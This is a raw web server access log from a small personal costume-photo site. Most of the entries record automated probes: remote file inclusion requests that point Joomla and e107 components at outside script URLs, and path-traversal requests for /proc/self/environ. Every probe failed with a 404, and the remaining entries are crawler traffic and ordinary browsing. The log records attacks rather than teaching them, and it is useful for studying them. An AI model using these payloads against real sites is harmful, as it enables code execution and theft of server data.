74.55.135.18 - - [31/May/2010:19:29:56 -0500] "GET /logs//citywriter/head.php?path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:19:29:56 -0500] "GET /logs/access_log.1271030400//citywriter/head.php?path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:19:30:06 -0500] "GET /logs/access_log.1270512000//citywriter/head.php?path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.46.13.47 - - [31/May/2010:19:33:25 -0500] "GET /logs/access_log.1225238400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.12.58.212 - - [31/May/2010:19:38:44 -0500] "GET /index.php?option=com_myblog&Itemid=3&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:19:39:59 -0500] "GET /index.php?option=com_myblog&Itemid=3&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.81.68.114 - - [31/May/2010:19:41:54 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.81.68.114 - - [31/May/2010:19:41:54 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.102.1.206 - - [31/May/2010:19:42:08 -0500] "GET /index.php?option=com_myblog&Itemid=3&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
123.243.67.208 - - [31/May/2010:19:42:29 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
208.115.111.248 - - [31/May/2010:19:45:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
74.124.198.60 - - [31/May/2010:19:48:43 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:43 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:43 -0500] "GET /logs/access_log.1274313600%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:45 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:45 -0500] "GET /logs/access_log.1274313600%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:45 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:45 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:45 -0500] "GET /logs/access_log.1274313600%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:45 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:49 -0500] "GET /logs/access_log.1212451200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:49 -0500] "GET /logs/access_log.1212451200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:48:51 -0500] "GET /logs/access_log.1212451200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:49:20 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:49:20 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:49:20 -0500] "GET /logs/access_log.1274313600%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
74.124.198.60 - - [31/May/2010:19:49:24 -0500] "GET /logs/access_log.1212451200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
87.250.255.243 - - [31/May/2010:19:53:06 -0500] "GET /logs/access_log.1250899200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.195 - - [31/May/2010:20:00:55 -0500] "GET /logs/access_log.1167609600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [31/May/2010:20:06:44 -0500] "GET /logs/access_log.1193875200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.195.232 - - [31/May/2010:20:19:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.232 - - [31/May/2010:20:19:26 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.12.58.212 - - [31/May/2010:20:21:13 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:20:21:13 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:20:21:27 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:20:21:27 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.102.1.206 - - [31/May/2010:20:22:30 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:20:22:31 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:20:25:09 -0500] "GET /logs/index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:20:25:09 -0500] "GET /index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
84.38.67.248 - - [31/May/2010:20:26:07 -0500] "GET /logs/e107_handlers/secure_img_render.php?ifile=http://www.1a-werbeportal.de/buyer_aboutus/backup/bot-edit/idx? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
84.38.67.248 - - [31/May/2010:20:26:07 -0500] "GET /e107_handlers/secure_img_render.php?ifile=http://www.1a-werbeportal.de/buyer_aboutus/backup/bot-edit/idx? HTTP/1.1" 404 319 "-""libwww-perl/5.813"
64.251.10.117 - - [31/May/2010:20:26:12 -0500] "GET /logs/index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:20:26:12 -0500] "GET /index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
84.38.67.248 - - [31/May/2010:20:26:24 -0500] "GET /e107_handlers/secure_img_render.php?ifile=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.813"
94.23.11.114 - - [31/May/2010:20:26:37 -0500] "GET /logs/index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:20:26:37 -0500] "GET /index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
84.38.67.248 - - [31/May/2010:20:26:48 -0500] "GET /e107_handlers/secure_img_render.php?ifile=http://www.1a-werbeportal.de/buyer_aboutus/backup/bot-edit/idx? HTTP/1.1" 404 319 "-""libwww-perl/5.813"
87.250.255.243 - - [31/May/2010:20:27:28 -0500] "GET /logs/access_log.1275004800 HTTP/1.1" 200 862165 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [31/May/2010:20:28:54 -0500] "GET /logs/access_log.1257465600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:20:28:57 -0500] "GET /logs/access_log.1257811200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:20:28:59 -0500] "GET /logs/access_log.1257897600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:20:29:01 -0500] "GET /logs/access_log.1258070400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
76.73.80.242 - - [31/May/2010:20:29:01 -0500] "GET /logs/index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:20:29:01 -0500] "GET /logs/index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:20:29:02 -0500] "GET /index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:20:29:02 -0500] "GET /index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
208.115.111.248 - - [31/May/2010:20:29:03 -0500] "GET /logs/access_log.1258416000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:20:29:06 -0500] "GET /logs/access_log.1258675200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:20:29:08 -0500] "GET /logs/access_log.1259020800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:20:29:10 -0500] "GET /logs/access_log.1259107200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
114.108.177.125 - - [31/May/2010:20:29:12 -0500] "GET /index.php?option=com_jvehicles&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:20:29:12 -0500] "GET /logs/index.php?option=com_jvehicles&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.115.111.248 - - [31/May/2010:20:29:13 -0500] "GET /logs/access_log.1259280000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
114.108.177.125 - - [31/May/2010:20:29:14 -0500] "GET /logs/access_log.1271462400/index.php?option=com_jvehicles&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.115.111.248 - - [31/May/2010:20:29:16 -0500] "GET /logs/access_log.1259625600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
114.108.177.125 - - [31/May/2010:20:30:03 -0500] "GET /logs/index.php?option=com_alphauserpoints&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:20:30:03 -0500] "GET /logs/access_log.1274572800/index.php?option=com_alphauserpoints&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:20:30:03 -0500] "GET /index.php?option=com_alphauserpoints&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
71.228.179.46 - - [31/May/2010:20:30:12 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:30:12 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:30:12 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:30:12 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:30:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
114.108.177.125 - - [31/May/2010:20:31:28 -0500] "GET /logs/access_log.1274832000/index.php?option=com_alphauserpoints&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.23.11.114 - - [31/May/2010:20:31:52 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:20:31:52 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
64.251.10.117 - - [31/May/2010:20:32:17 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:20:32:17 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:20:32:19 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [31/May/2010:20:32:19 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.23.11.114 - - [31/May/2010:20:32:20 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.11.114 - - [31/May/2010:20:32:20 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
71.228.179.46 - - [31/May/2010:20:32:21 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:24 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
72.55.146.140 - - [31/May/2010:20:32:25 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:20:32:25 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
71.228.179.46 - - [31/May/2010:20:32:32 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:32 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:32 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:33 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/013_JPG%20copy.jpg HTTP/1.1" 200 49391 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/014_JPG%20copy.jpg HTTP/1.1" 200 50000 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/017_JPG%20copy.jpg HTTP/1.1" 200 45390 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/016_JPG%20copy.jpg HTTP/1.1" 200 43371 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/015_JPG%20copy.jpg HTTP/1.1" 200 47836 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/018_JPG%20copy.jpg HTTP/1.1" 200 46283 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/019_JPG%20copy.jpg HTTP/1.1" 200 50528 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/021_JPG%20copy.jpg HTTP/1.1" 200 46071 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/020_JPG%20copy.jpg HTTP/1.1" 200 43734 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/022_JPG%20copy.jpg HTTP/1.1" 200 44855 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/023_JPG%20copy.jpg HTTP/1.1" 200 49344 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /costume/024_JPG%20copy.jpg HTTP/1.1" 200 48964 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
72.55.146.140 - - [31/May/2010:20:32:53 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
71.228.179.46 - - [31/May/2010:20:32:53 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
72.55.146.140 - - [31/May/2010:20:32:53 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
